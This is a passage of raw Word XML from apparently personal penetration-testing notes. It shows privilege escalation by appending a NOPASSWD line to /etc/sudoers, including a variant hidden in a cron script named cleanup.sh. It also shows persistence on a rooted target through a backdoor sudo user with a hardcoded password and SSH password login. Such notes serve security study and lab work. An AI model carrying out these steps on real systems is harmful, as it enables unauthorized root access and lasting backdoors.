    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E43">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E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45">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_i712xb90eicy" w:id="409"/>
      <w:bookmarkEnd w:id="409"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to add a sudo user if you can edit /etc/sudoers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E46">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E47">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Just add append this line:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E48">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1278"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">michael ALL=(ALL:ALL) ALL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E49">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1278"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Where michael is the name of your user</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E4A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E4B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or if you are trying to do it through a cron job, then do this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E4C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1318"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo 'echo "michael ALL=(ALL) NOPASSWD:ALL" &gt;&gt; /etc/sudoers' &gt; cleanup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1318"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This puts it into a file called cleanup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E4E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1318"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or just put it in manually to a file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1318"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo "michael ALL=(ALL) NOPASSWD:ALL" &gt;&gt; /etc/sudoers</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E50">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1318"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Put the entire thing into a file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E51">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E52">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then you can run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -i </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to get root shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E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54">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E55">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_jcwm4xjidfm" w:id="410"/>
      <w:bookmarkEnd w:id="410"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to add sudo user if you have root privileges (get out of limited shell)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E56">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E57">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Adding a sudo user is one way to get out of a limited shell, and then you can SSH into it, and then run "sudo -i" for root shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E58">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E59">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XXXXXXXXX-C .156 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">when I got root but in a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">per-command executor/wrapper,</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> meaning that I couldn't escape the current directory, and it didn't feel like a fully interactive shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E5A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E5B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> add another user and add them to the sudo group</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> so that they can run "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -i</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" and get a root shell. this is like adding a new user in windows and adding them to admin group</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E5C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="147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useradd -m -s /bin/bash michael</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E5D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1476"/>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-m</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → make a home dir (/home/michael)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E5E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1476"/>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-s /bin/bash</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → give it bash as default shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E5F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Verify that there is a michael directory in /home</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E60">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1476"/>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ls /home</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="147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echo 'michael:SuperSecret123!' | chpasswd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E62">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Give them sudo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E63">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1476"/>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usermod -aG sudo michael</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E64">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On distros without the sudo group, you might use wheel instead:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E65">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1476"/>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usermod -aG wheel michael</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Check that SSH daemon is running:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1476"/>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systemctl status ssh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E68">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make sure </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/ssh/sshd_config</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> allows password login:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E69">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PermitRootLogin prohibit-password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E6A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PasswordAuthentication yes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E6B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Restart sshd if you change the config:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E6C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="147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systemctl restart ssh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E6D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1476"/>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ssh michael@192.168.239.156</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E6E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">password is: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SuperSecret123!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E6F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1476"/>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sudo -i</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E70">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and now you're root!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E71">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E72">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E73">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E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75">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E76">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_mjfg1isu64jx" w:id="411"/>
